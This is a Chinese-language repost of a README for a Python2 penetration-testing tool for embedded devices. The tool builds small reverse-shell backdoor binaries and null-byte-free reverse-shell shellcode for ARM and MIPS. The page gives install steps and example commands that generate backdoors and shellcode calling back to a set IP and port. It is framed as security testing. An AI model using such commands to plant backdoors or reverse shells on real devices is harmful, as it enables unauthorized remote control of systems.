栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

嵌入式设备后门与shellcode生成工具

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

嵌入式设备后门与shellcode生成工具

介绍

在嵌入式设备的渗透和漏洞挖掘过程中,遇到了许多问题。一个是一些设备没有telnetd或ssh服务来获得交互式shell,另一个是内存损坏漏洞(如堆栈溢出)通常是空字节截断,因此构造反向shell代码更麻烦,因此开发此工具是为了利用该漏洞。该工具基于PWN模块开发,目前使用python2语言

项目地址[

项目地址github

功能

该工具嵌入到设备的安全测试中。有两个主要功能:
1.生成各种架构的后门程序。后门程序是用反向shell汇编代码打包的,大小很小现在支持Armv5、Armv7、Armv8、mipsel和mips,仍在更新中
2.在攻击过程中生成各种架构的反向shell代码,且无空字节,这有助于攻击嵌入式设备上的内存损坏漏洞现在支持Armv5、Armv7、Armv8、mipsel和mips,仍在更新中

打包生成ELF

python2安装pwn模块

pip install pwn

​使用nuitka 打包py生成ELF

nuitka hackEmbedded_tool.py
mv hackEmbedded_tool.exe hackEmbedded_tool

尽可能将生成后门shellcode的模块文件放入python2的site-packages中

sudo cp ./generate_* {your_dir}/site-packages
sudo cp ./extract_shellcode.py {your_dir}/site-packages
sudo cp ./hackEmbedded_tool /usr/bin/

可以在python终端下使用sys.path查找site-packages路径

Python 2.7.17 (default, Mar 18 2022, 13:21:42) 
[GCC 7.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> sys.path
怎么使用

要使用生成后门或反向shell汇编的机器码,需要指定ip地址、端口号、架构、endian(默认为armv7)

以下是生成不带空字节的反向shell机器码的示例

hackEmbedded_tool -reverse_ip 192.168.7.1 -reverse_port 444 -arch arm -endian little -exploit_shellcode 1


这是生成对应架构的后门文件的使用示列

hackEmbedded_tool -reverse_ip 192.168.7.1 -reverse_port 444 -arch arm -endian little -backdoor_file 1

使用-h可以查看命令提示

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/839792.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号